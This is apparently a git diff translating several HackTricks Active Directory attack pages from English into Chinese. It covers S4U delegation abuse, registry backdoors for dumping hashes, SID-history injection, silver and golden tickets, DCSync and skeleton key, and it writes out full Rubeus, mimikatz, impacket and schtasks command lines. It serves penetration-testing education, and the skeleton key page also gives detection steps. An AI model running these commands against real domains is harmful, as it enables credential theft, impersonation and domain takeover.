 $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$ComputerSid)"
@@ -80,55 +73,46 @@ msds-allowedtoactonbehalfofotheridentity
 ----------------------------------------
 {1, 0, 4, 128...}
 ```
+### 执行完整的 S4U 攻击
 
-### Performing a complete S4U attack
-
-First of all, we created the new Computer object with the password `123456`, so we need the hash of that password:
-
+首先，我们创建了新的计算机对象，密码为 `123456`，因此我们需要该密码的哈希值：
 ```bash
 .\Rubeus.exe hash /password:123456 /user:FAKECOMPUTER$ /domain:domain.local
 ```
-
-This will print the RC4 and AES hashes for that account.\
-Now, the attack can be performed:
-
+这将打印该账户的 RC4 和 AES 哈希。\
+现在，可以执行攻击：
 ```bash
 rubeus.exe s4u /user:FAKECOMPUTER$ /aes256:<aes256 hash> /aes128:<aes128 hash> /rc4:<rc4 hash> /impersonateuser:administrator /msdsspn:cifs/victim.domain.local /domain:domain.local /ptt
 ```
-
-You can generate more tickets just asking once using the `/altservice` param of Rubeus:
-
+您只需使用 Rubeus 的 `/altservice` 参数询问一次即可生成更多票证：
 ```bash
 rubeus.exe s4u /user:FAKECOMPUTER$ /aes256:<AES 256 hash> /impersonateuser:administrator /msdsspn:cifs/victim.domain.local /altservice:krbtgt,cifs,host,http,winrm,RPCSS,wsman,ldap /domain:domain.local /ptt
 ```
-
 > [!CAUTION]
-> Note that users has an attribute called "**Cannot be delegated**". If a user has this attribute to True, you won't be able to impersonate him . This property can be seen inside bloodhound.
+> 注意，用户有一个属性叫做“**无法被委托**”。如果用户的此属性为 True，您将无法冒充他。此属性可以在 bloodhound 中查看。
 
-### Accessing
-
-The last command line will perform the **complete S4U attack and will inject the TGS** from Administrator to the victim host in **memory**.\
-In this example it was requested a TGS for the **CIFS** service from Administrator, so you will be able to access **C$**:
+### 访问
 
+最后一条命令将执行 **完整的 S4U 攻击，并将 TGS 从 Administrator 注入到受害主机的 **内存** 中。\
+在此示例中，请求了 Administrator 的 **CIFS** 服务的 TGS，因此您将能够访问 **C$**：
 ```bash
 ls \\victim.domain.local\C$
 ```
+### 滥用不同的服务票证
 
-### Abuse different service tickets
+了解[**可用的服务票证在这里**](silver-ticket.md#available-services)。
 
-Lear about the [**available service tickets here**](silver-ticket.md#available-services).
+## Kerberos 错误
 
-## Kerberos Errors
+- **`KDC_ERR_ETYPE_NOTSUPP`**：这意味着 kerberos 配置为不使用 DES 或 RC4，而您仅提供了 RC4 哈希。至少向 Rubeus 提供 AES256 哈希（或同时提供 rc4、aes128 和 aes256 哈希）。示例：`[Rubeus.Program]::MainString("s4u /user:FAKECOMPUTER /aes256:CC648CF0F809EE1AA25C52E963AC0487E87AC32B1F71ACC5304C73BF566268DA /aes128:5FC3D06ED6E8EA2C9BB9CC301EA37AD4 /rc4:EF266C6B963C0BB683941032008AD47F /impersonateuser:Administrator /msdsspn:CIFS/M3DC.M3C.LOCAL /ptt".split())`
+- **`KRB_AP_ERR_SKEW`**：这意味着当前计算机的时间与 DC 的时间不同，kerberos 工作不正常。
+- **`preauth_failed`**：这意味着给定的用户名 + 哈希无法登录。您可能忘记在生成哈希时在用户名中放入“$”（`.\Rubeus.exe hash /password:123456 /user:FAKECOMPUTER$ /domain:domain.local`）
+- **`KDC_ERR_BADOPTION`**：这可能意味着：
+  - 您尝试模拟的用户无法访问所需的服务（因为您无法模拟它或因为它没有足够的权限）
+  - 请求的服务不存在（如果您请求 winrm 的票证但 winrm 没有运行）
+  - 创建的 fakecomputer 已失去对易受攻击服务器的权限，您需要将其恢复。
 
-- **`KDC_ERR_ETYPE_NOTSUPP`**: This means that kerberos is configured to not use DES or RC4 and you are supplying just the RC4 hash. Supply to Rubeus at least the AES256 hash (or just supply it the rc4, aes128 and aes256 hashes). Example: `[Rubeus.Program]::MainString("s4u /user:FAKECOMPUTER /aes256:CC648CF0F809EE1AA25C52E963AC0487E87AC32B1F71ACC5304C73BF566268DA /aes128:5FC3D06ED6E8EA2C9BB9CC301EA37AD4 /rc4:EF266C6B963C0BB683941032008AD47F /impersonateuser:Administrator /msdsspn:CIFS/M3DC.M3C.LOCAL /ptt".split())`
-- **`KRB_AP_ERR_SKEW`**: This means that the time of the current computer is different from the one of the DC and kerberos is not working properly.
-- **`preauth_failed`**: This means that the given username + hashes aren't working to login. You may have forgotten to put the "$" inside the username when generating the hashes (`.\Rubeus.exe hash /password:123456 /user:FAKECOMPUTER$ /domain:domain.local`)
-- **`KDC_ERR_BADOPTION`**: This may mean:
-  - The user you are trying to impersonate cannot access the desired service (because you cannot impersonate it or because it doesn't have enough privileges)
-  - The asked service doesn't exist (if you ask for a ticket for winrm but winrm isn't running)
-  - The fakecomputer created has lost it's privileges over the vulnerable server and you need to given them back.
-
-## References
+## 参考文献
 
 - [https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html](https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html)
 - [https://www.harmj0y.net/blog/redteaming/another-word-on-delegation/](https://www.harmj0y.net/blog/redteaming/another-word-on-delegation/)
@@ -140,4 +124,3 @@ Lear about the [**available service tickets here**](silver-ticket.md#available-s
 {% embed url="https://websec.nl/" %}
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/windows-hardening/active-directory-methodology/security-descriptors.md b/src/windows-hardening/active-directory-methodology/security-descriptors.md
index 707e4f162..fc8f971c9 100644
--- a/src/windows-hardening/active-directory-methodology/security-descriptors.md
+++ b/src/windows-hardening/active-directory-methodology/security-descriptors.md
@@ -1,37 +1,32 @@
-# Security Descriptors
+# 安全描述符
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## Security Descriptors
+## 安全描述符
 
-[From the docs](https://learn.microsoft.com/en-us/windows/win32/secauthz/security-descriptor-definition-language): Security Descriptor Definition Language (SDDL) defines the format which is used to describe a security descriptor. SDDL uses ACE strings for DACL and SACL: `ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid;`
+[来自文档](https://learn.microsoft.com/en-us/windows/win32/secauthz/security-descriptor-definition-language)：安全描述符定义语言（SDDL）定义了用于描述安全描述符的格式。SDDL使用ACE字符串用于DACL和SACL：`ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid;`
 
-The **security descriptors** are used to **store** the **permissions** an **object** has **over** an **object**. If you can just **make** a **little change** in the **security descriptor** of an object, you can obtain very interesting privileges over that object without needing to be member of a privileged group.
+**安全描述符**用于**存储**一个**对象**对另一个**对象**的**权限**。如果您可以在一个对象的**安全描述符**中**做出一点改变**，您可以在不需要成为特权组成员的情况下获得对该对象非常有趣的权限。
 
-Then, this persistence technique is based on the ability to win every privilege needed against certain objects, to be able to perform a task that usually requires admin privileges but without the need of being admin.
+因此，这种持久性技术基于赢得对某些对象所需的每个权限的能力，以便能够执行通常需要管理员权限的任务，但不需要成为管理员。
 
-### Access to WMI
-
-You can give a user access to **execute remotely WMI** [**using this**](https://github.com/samratashok/nishang/blob/master/Backdoors/Set-RemoteWMI.ps1):
+### 访问WMI
 
+您可以给用户访问**远程执行WMI**的权限 [**使用这个**](https://github.com/samratashok/nishang/blob/master/Backdoors/Set-RemoteWMI.ps1)：
 ```bash
 Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc –namespace 'root\cimv2' -Verbose
 Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc–namespace 'root\cimv2' -Remove -Verbose #Remove
 ```
+### 访问 WinRM
 
-### Access to WinRM
-
-Give access to **winrm PS console to a user** [**using this**](https://github.com/samratashok/nishang/blob/master/Backdoors/Set-RemoteWMI.ps1)**:**
-
+给用户提供 **winrm PS 控制台的访问权限** [**使用这个**](https://github.com/samratashok/nishang/blob/master/Backdoors/Set-RemoteWMI.ps1)**:**
 ```bash
 Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Verbose
 Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Remove #Remove
 ```
+### 远程访问哈希
 
-### Remote access to hashes
-
-Access the **registry** and **dump hashes** creating a **Reg backdoor using** [**DAMP**](https://github.com/HarmJ0y/DAMP)**,** so you can at any moment retrieve the **hash of the computer**, the **SAM** and any **cached AD** credential in the computer. So, it's very useful to give this permission to a **regular user against a Domain Controller computer**:
-
+访问 **registry** 并 **dump hashes** 创建一个 **Reg backdoor using** [**DAMP**](https://github.com/HarmJ0y/DAMP)**,** 这样你可以随时检索 **计算机的哈希**、**SAM** 以及计算机中的任何 **缓存的 AD** 凭据。因此，将此权限授予 **普通用户对域控制器计算机** 是非常有用的：
 ```bash
 # allows for the remote retrieval of a system's machine and local account hashes, as well as its domain cached credentials.
 Add-RemoteRegBackdoor -ComputerName <remotehost> -Trustee student1 -Verbose
@@ -45,8 +40,6 @@ Get-RemoteLocalAccountHash -ComputerName <remotehost> -Verbose
 # Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the domain cached credentials for the specified machine.
 Get-RemoteCachedCredential -ComputerName <remotehost> -Verbose
 ```
-
-Check [**Silver Tickets**](silver-ticket.md) to learn how you could use the hash of the computer account of a Domain Controller.
+查看 [**Silver Tickets**](silver-ticket.md) 以了解如何使用域控制器计算机帐户的哈希值。
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/windows-hardening/active-directory-methodology/sid-history-injection.md b/src/windows-hardening/active-directory-methodology/sid-history-injection.md
index dc53783a0..11c21e47a 100644
--- a/src/windows-hardening/active-directory-methodology/sid-history-injection.md
+++ b/src/windows-hardening/active-directory-methodology/sid-history-injection.md
@@ -1,25 +1,22 @@
-# SID-History Injection
+# SID-History 注入
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## SID History Injection Attack
+## SID 历史注入攻击
 
-The focus of the **SID History Injection Attack** is aiding **user migration between domains** while ensuring continued access to resources from the former domain. This is accomplished by **incorporating the user's previous Security Identifier (SID) into the SID History** of their new account. Notably, this process can be manipulated to grant unauthorized access by adding the SID of a high-privilege group (such as Enterprise Admins or Domain Admins) from the parent domain to the SID History. This exploitation confers access to all resources within the parent domain.
+**SID 历史注入攻击**的重点是帮助**用户在域之间迁移**，同时确保继续访问前一个域的资源。这是通过**将用户之前的安全标识符 (SID) 纳入其新账户的 SID 历史**来实现的。值得注意的是，这一过程可以被操控，通过将来自父域的高权限组（如企业管理员或域管理员）的 SID 添加到 SID 历史中，从而授予未经授权的访问权限。这种利用方式使得访问父域内的所有资源成为可能。
 
-Two methods exist for executing this attack: through the creation of either a **Golden Ticket** or a **Diamond Ticket**.
+执行此攻击有两种方法：通过创建**黄金票证**或**钻石票证**。
 
-To pinpoint the SID for the **"Enterprise Admins"** group, one must first locate the SID of the root domain. Following the identification, the Enterprise Admins group SID can be constructed by appending `-519` to the root domain's SID. For instance, if the root domain SID is `S-1-5-21-280534878-1496970234-700767426`, the resulting SID for the "Enterprise Admins" group would be `S-1-5-21-280534878-1496970234-700767426-519`.
+要确定**“企业管理员”**组的 SID，首先必须找到根域的 SID。在识别后，可以通过将 `-519` 附加到根域的 SID 来构建企业管理员组的 SID。例如，如果根域 SID 为 `S-1-5-21-280534878-1496970234-700767426`，则“企业管理员”组的结果 SID 将为 `S-1-5-21-280534878-1496970234-700767426-519`。
 
-You could also use the **Domain Admins** groups, which ends in **512**.
-
-Another way yo find the SID of a group of the other domain (for example "Domain Admins") is with:
+您还可以使用**域管理员**组，其 SID 以**512**结尾。
 
+找到其他域（例如“域管理员”）组的 SID 的另一种方法是：
 ```powershell
 Get-DomainGroup -Identity "Domain Admins" -Domain parent.io -Properties ObjectSid
 ```
-
-### Golden Ticket (Mimikatz) with KRBTGT-AES256
-
+### Golden Ticket (Mimikatz) 与 KRBTGT-AES256
 ```bash
 mimikatz.exe "kerberos::golden /user:Administrator /domain:<current_domain> /sid:<current_domain_sid> /sids:<victim_domain_sid_of_group> /aes256:<krbtgt_aes256> /startoffset:-10 /endin:600 /renewmax:10080 /ticket:ticket.kirbi" "exit"
 
@@ -36,15 +33,13 @@ mimikatz.exe "kerberos::golden /user:Administrator /domain:<current_domain> /sid
 # The previous command will generate a file called ticket.kirbi
 # Just loading you can perform a dcsync attack agains the domain
 ```
-
-For more info about golden tickets check:
+有关黄金票证的更多信息，请查看：
 
 {{#ref}}
 golden-ticket.md
 {{#endref}}
 
-### Diamond Ticket (Rubeus + KRBTGT-AES256)
-
+### 钻石票证 (Rubeus + KRBTGT-AES256)
 ```powershell
 # Use the /sids param
 Rubeus.exe diamond /tgtdeleg /ticketuser:Administrator /ticketuserid:500 /groups:512 /sids:S-1-5-21-378720957-2217973887-3501892633-512 /krbkey:390b2fdb13cc820d73ecf2dadddd4c9d76425d4c2156b89ac551efb9d591a8aa /nowrap
@@ -54,21 +49,17 @@ Rubeus.exe golden /rc4:<krbtgt hash> /domain:<child_domain> /sid:<child_domain_s
 
 # You can use "Administrator" as username or any other string
 ```
-
-For more info about diamond tickets check:
+有关 diamond tickets 的更多信息，请查看：
 
 {{#ref}}
 diamond-ticket.md
 {{#endref}}
-
 ```bash
 .\asktgs.exe C:\AD\Tools\kekeo_old\trust_tkt.kirbi CIFS/mcorp-dc.moneycorp.local
 .\kirbikator.exe lsa .\CIFS.mcorpdc.moneycorp.local.kirbi
 ls \\mcorp-dc.moneycorp.local\c$
 ```
-
-Escalate to DA of root or Enterprise admin using the KRBTGT hash of the compromised domain:
-
+使用被攻陷域的 KRBTGT 哈希提升到根或企业管理员的 DA：
 ```bash
 Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-211874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234700767426-519 /krbtgt:ff46a9d8bd66c6efd77603da26796f35 /ticket:C:\AD\Tools\krbtgt_tkt.kirbi"'
 
@@ -80,17 +71,15 @@ schtasks /create /S mcorp-dc.moneycorp.local /SC Weekely /RU "NT Authority\SYSTE
 
 schtasks /Run /S mcorp-dc.moneycorp.local /TN "STCheck114"
 ```
-
-With the acquired permissions from the attack you can execute for example a DCSync attack in the new domain:
+通过攻击获得的权限，您可以在新域中执行例如 DCSync 攻击：
 
 {{#ref}}
 dcsync.md
 {{#endref}}
 
-### From linux
-
-#### Manual with [ticketer.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/ticketer.py)
+### 从 Linux
 
+#### 使用 [ticketer.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/ticketer.py) 手动执行
 ```bash
 # This is for an attack from child to root domain
 # Get child domain SID
@@ -110,31 +99,27 @@ export KRB5CCNAME=hacker.ccache
 # psexec in domain controller of root
 psexec.py <child_domain>/Administrator@dc.root.local -k -no-pass -target-ip 10.10.10.10
 ```
+#### 自动使用 [raiseChild.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/raiseChild.py)
 
-#### Automatic using [raiseChild.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/raiseChild.py)
+这是一个 Impacket 脚本，它将 **自动化从子域提升到父域**。该脚本需要：
 
-This is an Impacket script which will **automate escalating from child to parent domain**. The script needs:
+- 目标域控制器
+- 子域中管理员用户的凭据
 
-- Target domain controller
-- Creds for an admin user in the child domain
-
-The flow is:
-
-- Obtains the SID for the Enterprise Admins group of the parent domain
-- Retrieves the hash for the KRBTGT account in the child domain
-- Creates a Golden Ticket
-- Logs into the parent domain
-- Retrieves credentials for the Administrator account in the parent domain
-- If the `target-exec` switch is specified, it authenticates to the parent domain's Domain Controller via Psexec.
+流程如下：
 
+- 获取父域的企业管理员组的 SID
+- 检索子域中 KRBTGT 账户的哈希
+- 创建一个黄金票证
+- 登录到父域
+- 检索父域中管理员账户的凭据
+- 如果指定了 `target-exec` 开关，它将通过 Psexec 认证到父域的域控制器。
 ```bash
 raiseChild.py -target-exec 10.10.10.10 <child_domain>/username
 ```
-
-## References
+## 参考
 
 - [https://adsecurity.org/?p=1772](https://adsecurity.org/?p=1772)
 - [https://www.sentinelone.com/blog/windows-sid-history-injection-exposure-blog/](https://www.sentinelone.com/blog/windows-sid-history-injection-exposure-blog/)
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/windows-hardening/active-directory-methodology/silver-ticket.md b/src/windows-hardening/active-directory-methodology/silver-ticket.md
index 002963e2c..d9382b2b2 100644
--- a/src/windows-hardening/active-directory-methodology/silver-ticket.md
+++ b/src/windows-hardening/active-directory-methodology/silver-ticket.md
@@ -4,26 +4,23 @@
 
 <figure><img src="../../images/i3.png" alt=""><figcaption></figcaption></figure>
 
-**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
+**Bug bounty tip**: **注册** **Intigriti**，一个由黑客为黑客创建的高级**漏洞赏金平台**！今天就加入我们，访问 [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks)，开始赚取高达 **$100,000** 的赏金！
 
 {% embed url="https://go.intigriti.com/hacktricks" %}
 
 ## Silver ticket
 
-The **Silver Ticket** attack involves the exploitation of service tickets in Active Directory (AD) environments. This method relies on **acquiring the NTLM hash of a service account**, such as a computer account, to forge a Ticket Granting Service (TGS) ticket. With this forged ticket, an attacker can access specific services on the network, **impersonating any user**, typically aiming for administrative privileges. It's emphasized that using AES keys for forging tickets is more secure and less detectable.
+**Silver Ticket** 攻击涉及在 Active Directory (AD) 环境中利用服务票证。此方法依赖于 **获取服务账户的 NTLM 哈希**，例如计算机账户，以伪造票据授予服务 (TGS) 票证。通过这个伪造的票证，攻击者可以访问网络上的特定服务，**冒充任何用户**，通常目标是获取管理权限。强调使用 AES 密钥伪造票证更安全且不易被检测。
 
-For ticket crafting, different tools are employed based on the operating system:
+对于票证制作，根据操作系统使用不同的工具：
 
 ### On Linux
-
 ```bash
 python ticketer.py -nthash <HASH> -domain-sid <DOMAIN_SID> -domain <DOMAIN> -spn <SERVICE_PRINCIPAL_NAME> <USER>
 export KRB5CCNAME=/root/impacket-examples/<TICKET_NAME>.ccache
 python psexec.py <DOMAIN>/<USER>@<TARGET> -k -no-pass
 ```
-
-### On Windows
-
+### 在Windows上
 ```bash
 # Create the ticket
 mimikatz.exe "kerberos::golden /domain:<DOMAIN> /sid:<DOMAIN_SID> /rc4:<HASH> /user:<USER> /service:<SERVICE> /target:<TARGET>"
@@ -35,47 +32,44 @@ mimikatz.exe "kerberos::ptt <TICKET_FILE>"
 # Obtain a shell
 .\PsExec.exe -accepteula \\<TARGET> cmd
 ```
+CIFS服务被强调为访问受害者文件系统的常见目标，但其他服务如HOST和RPCSS也可以被利用进行任务和WMI查询。
 
-The CIFS service is highlighted as a common target for accessing the victim's file system, but other services like HOST and RPCSS can also be exploited for tasks and WMI queries.
+## 可用服务
 
-## Available Services
+| 服务类型                                   | 服务银票                                                         |
+| ------------------------------------------ | --------------------------------------------------------------- |
+| WMI                                        | <p>HOST</p><p>RPCSS</p>                                        |
+| PowerShell远程                             | <p>HOST</p><p>HTTP</p><p>根据操作系统还包括：</p><p>WSMAN</p><p>RPCSS</p> |
+| WinRM                                      | <p>HOST</p><p>HTTP</p><p>在某些情况下，您可以直接请求：WINRM</p> |
+| 计划任务                                  | HOST                                                           |
+| Windows文件共享，也包括psexec            | CIFS                                                           |
+| LDAP操作，包括DCSync                      | LDAP                                                           |
+| Windows远程服务器管理工具                 | <p>RPCSS</p><p>LDAP</p><p>CIFS</p>                             |
+| 黄金票证                                  | krbtgt                                                         |
 
-| Service Type                               | Service Silver Tickets                                                     |
-| ------------------------------------------ | -------------------------------------------------------------------------- |
-| WMI                                        | <p>HOST</p><p>RPCSS</p>                                                    |
-| PowerShell Remoting                        | <p>HOST</p><p>HTTP</p><p>Depending on OS also:</p><p>WSMAN</p><p>RPCSS</p> |
-| WinRM                                      | <p>HOST</p><p>HTTP</p><p>In some occasions you can just ask for: WINRM</p> |
-| Scheduled Tasks                            | HOST                                                                       |
-| Windows File Share, also psexec            | CIFS                                                                       |
-| LDAP operations, included DCSync           | LDAP                                                                       |
-| Windows Remote Server Administration Tools | <p>RPCSS</p><p>LDAP</p><p>CIFS</p>                                         |
-| Golden Tickets                             | krbtgt                                                                     |
-
-Using **Rubeus** you may **ask for all** these tickets using the parameter:
+使用**Rubeus**，您可以使用参数**请求所有**这些票证：
 
 - `/altservice:host,RPCSS,http,wsman,cifs,ldap,krbtgt,winrm`
 
-### Silver tickets Event IDs
+### 银票事件ID
 
-- 4624: Account Logon
-- 4634: Account Logoff
-- 4672: Admin Logon
+- 4624：账户登录
+- 4634：账户注销
+- 4672：管理员登录
 
-## Abusing Service tickets
+## 滥用服务票证
 
-In the following examples lets imagine that the ticket is retrieved impersonating the administrator account.
+在以下示例中，假设票证是通过模拟管理员账户获取的。
 
 ### CIFS
 
-With this ticket you will be able to access the `C$` and `ADMIN$` folder via **SMB** (if they are exposed) and copy files to a part of the remote filesystem just doing something like:
-
+使用此票证，您将能够通过**SMB**访问`C$`和`ADMIN$`文件夹（如果它们被暴露）并将文件复制到远程文件系统的某个部分，只需执行类似以下操作：
 ```bash
 dir \\vulnerable.computer\C$
 dir \\vulnerable.computer\ADMIN$
 copy afile.txt \\vulnerable.computer\C$\Windows\Temp
 ```
-
-You will also be able to obtain a shell inside the host or execute arbitrary commands using **psexec**:
+您还可以通过 **psexec** 在主机内部获取 shell 或执行任意命令：
 
 {{#ref}}
 ../lateral-movement/psexec-and-winexec.md
@@ -83,8 +77,7 @@ You will also be able to obtain a shell inside the host or execute arbitrary com
 
 ### HOST
 
-With this permission you can generate scheduled tasks in remote computers and execute arbitrary commands:
-
+凭借此权限，您可以在远程计算机上生成计划任务并执行任意命令：
 ```bash
 #Check you have permissions to use schtasks over a remote server
 schtasks /S some.vuln.pc
@@ -96,11 +89,9 @@ schtasks /query /S some.vuln.pc
 #Run created schtask now
 schtasks /Run /S mcorp-dc.moneycorp.local /TN "SomeTaskName"
 ```
-
 ### HOST + RPCSS
 
-With these tickets you can **execute WMI in the victim system**:
-
+使用这些票证，您可以**在受害者系统中执行 WMI**：
 ```bash
 #Check you have enough privileges
 Invoke-WmiMethod -class win32_operatingsystem -ComputerName remote.computer.local
@@ -110,8 +101,7 @@ Invoke-WmiMethod win32_process -ComputerName $Computer -name create -argumentlis
 #You can also use wmic
 wmic remote.computer.local list full /format:list
 ```
-
-Find **more information about wmiexec** in the following page:
+找到有关 **wmiexec** 的更多信息，请访问以下页面：
 
 {{#ref}}
 ../lateral-movement/wmiexec.md
@@ -119,32 +109,28 @@ Find **more information about wmiexec** in the following page:
 
 ### HOST + WSMAN (WINRM)
 
-With winrm access over a computer you can **access it** and even get a PowerShell:
-
+通过 winrm 访问计算机，您可以 **访问它**，甚至获取 PowerShell：
 ```bash
 New-PSSession -Name PSC -ComputerName the.computer.name; Enter-PSSession PSC
 ```
-
-Check the following page to learn **more ways to connect with a remote host using winrm**:
+查看以下页面以了解 **使用 winrm 连接远程主机的更多方法**：
 
 {{#ref}}
 ../lateral-movement/winrm.md
 {{#endref}}
 
 > [!WARNING]
-> Note that **winrm must be active and listening** on the remote computer to access it.
+> 请注意，**winrm 必须在远程计算机上处于活动和监听状态**才能访问它。
 
 ### LDAP
 
-With this privilege you can dump the DC database using **DCSync**:
-
+凭借此权限，您可以使用 **DCSync** 转储 DC 数据库：
 ```
 mimikatz(commandline) # lsadump::dcsync /dc:pcdc.domain.local /domain:domain.local /user:krbtgt
 ```
+**了解更多关于 DCSync** 在以下页面：
 
-**Learn more about DCSync** in the following page:
-
-## References
+## 参考
 
 - [https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberos-silver-tickets](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberos-silver-tickets)
 - [https://www.tarlogic.com/blog/how-to-attack-kerberos/](https://www.tarlogic.com/blog/how-to-attack-kerberos/)
@@ -155,9 +141,8 @@ dcsync.md
 
 <figure><img src="../../images/i3.png" alt=""><figcaption></figcaption></figure>
 
-**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
+**漏洞赏金提示**：**注册** **Intigriti**，一个由黑客为黑客创建的高级**漏洞赏金平台**！今天就加入我们 [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks)，开始赚取高达 **$100,000** 的赏金！
 
 {% embed url="https://go.intigriti.com/hacktricks" %}
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/windows-hardening/active-directory-methodology/skeleton-key.md b/src/windows-hardening/active-directory-methodology/skeleton-key.md
index 934b0890a..8da08d98c 100644
--- a/src/windows-hardening/active-directory-methodology/skeleton-key.md
+++ b/src/windows-hardening/active-directory-methodology/skeleton-key.md
@@ -4,29 +4,28 @@
 
 ## Skeleton Key Attack
 
-The **Skeleton Key attack** is a sophisticated technique that allows attackers to **bypass Active Directory authentication** by **injecting a master password** into the domain controller. This enables the attacker to **authenticate as any user** without their password, effectively **granting them unrestricted access** to the domain.
+**Skeleton Key 攻击**是一种复杂的技术，允许攻击者通过**将主密码注入域控制器**来**绕过 Active Directory 认证**。这使得攻击者能够**以任何用户的身份进行认证**而无需他们的密码，从而**授予他们对域的无限制访问**。
 
-It can be performed using [Mimikatz](https://github.com/gentilkiwi/mimikatz). To carry out this attack, **Domain Admin rights are prerequisite**, and the attacker must target each domain controller to ensure a comprehensive breach. However, the attack's effect is temporary, as **restarting the domain controller eradicates the malware**, necessitating a reimplementation for sustained access.
+可以使用 [Mimikatz](https://github.com/gentilkiwi/mimikatz) 执行此攻击。进行此攻击的**前提是拥有域管理员权限**，攻击者必须针对每个域控制器以确保全面的突破。然而，攻击的效果是暂时的，因为**重启域控制器会消除恶意软件**，需要重新实施以维持访问。
 
-**Executing the attack** requires a single command: `misc::skeleton`.
+**执行攻击**只需一个命令：`misc::skeleton`。
 
 ## Mitigations
 
-Mitigation strategies against such attacks include monitoring for specific event IDs that indicate the installation of services or the use of sensitive privileges. Specifically, looking for System Event ID 7045 or Security Event ID 4673 can reveal suspicious activities. Additionally, running `lsass.exe` as a protected process can significantly hinder attackers' efforts, as this requires them to employ a kernel mode driver, increasing the attack's complexity.
+针对此类攻击的缓解策略包括监控特定事件 ID，以指示服务的安装或敏感权限的使用。具体来说，查找系统事件 ID 7045 或安全事件 ID 4673 可以揭示可疑活动。此外，将 `lsass.exe` 作为受保护的进程运行可以显著阻碍攻击者的努力，因为这要求他们使用内核模式驱动程序，从而增加攻击的复杂性。
 
-Here are the PowerShell commands to enhance security measures:
+以下是增强安全措施的 PowerShell 命令：
 
-- To detect the installation of suspicious services, use: `Get-WinEvent -FilterHashtable @{Logname='System';ID=7045} | ?{$_.message -like "*Kernel Mode Driver*"}`
+- 要检测可疑服务的安装，请使用：`Get-WinEvent -FilterHashtable @{Logname='System';ID=7045} | ?{$_.message -like "*Kernel Mode Driver*"}`
 
-- Specifically, to detect Mimikatz's driver, the following command can be utilized: `Get-WinEvent -FilterHashtable @{Logname='System';ID=7045} | ?{$_.message -like "*Kernel Mode Driver*" -and $_.message -like "*mimidrv*"}`
+- 特别是，要检测 Mimikatz 的驱动程序，可以使用以下命令：`Get-WinEvent -FilterHashtable @{Logname='System';ID=7045} | ?{$_.message -like "*Kernel Mode Driver*" -and $_.message -like "*mimidrv*"}`
 
-- To fortify `lsass.exe`, enabling it as a protected process is recommended: `New-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name RunAsPPL -Value 1 -Verbose`
+- 为了加强 `lsass.exe`，建议将其启用为受保护的进程：`New-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name RunAsPPL -Value 1 -Verbose`
 
-Verification after a system reboot is crucial to ensure that the protective measures have been successfully applied. This is achievable through: `Get-WinEvent -FilterHashtable @{Logname='System';ID=12} | ?{$_.message -like "*protected process*`
+在系统重启后进行验证至关重要，以确保保护措施已成功应用。这可以通过以下命令实现：`Get-WinEvent -FilterHashtable @{Logname='System';ID=12} | ?{$_.message -like "*protected process*`
 
 ## References
 
 - [https://blog.netwrix.com/2022/11/29/skeleton-key-attack-active-directory/](https://blog.netwrix.com/2022/11/29/skeleton-key-attack-active-directory/)
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/windows-hardening/active-directory-methodology/unconstrained-delegation.md b/src/windows-hardening/active-directory-methodology/unconstrained-delegation.md
index eff0a89b2..d93ee4b5a 100644
--- a/src/windows-hardening/active-directory-methodology/unconstrained-delegation.md
+++ b/src/windows-hardening/active-directory-methodology/unconstrained-delegation.md
@@ -4,11 +4,11 @@
 
 ## Unconstrained delegation
 
-This a feature that a Domain Administrator can set to any **Computer** inside the domain. Then, anytime a **user logins** onto the Computer, a **copy of the TGT** of that user is going to be **sent inside the TGS** provided by the DC **and saved in memory in LSASS**. So, if you have Administrator privileges on the machine, you will be able to **dump the tickets and impersonate the users** on any machine.
+这是一个域管理员可以设置在域内任何**计算机**上的功能。然后，每当**用户登录**到该计算机时，该用户的**TGT副本**将被**发送到DC提供的TGS中**并**保存在LSASS的内存中**。因此，如果您在该机器上拥有管理员权限，您将能够**转储票证并冒充用户**在任何机器上。
 
-So if a domain admin logins inside a Computer with "Unconstrained Delegation" feature activated, and you have local admin privileges inside that machine, you will be able to dump the ticket and impersonate the Domain Admin anywhere (domain privesc).
+因此，如果域管理员登录到启用了“无约束委派”功能的计算机，并且您在该机器上拥有本地管理员权限，您将能够转储票证并在任何地方冒充域管理员（域权限提升）。
 
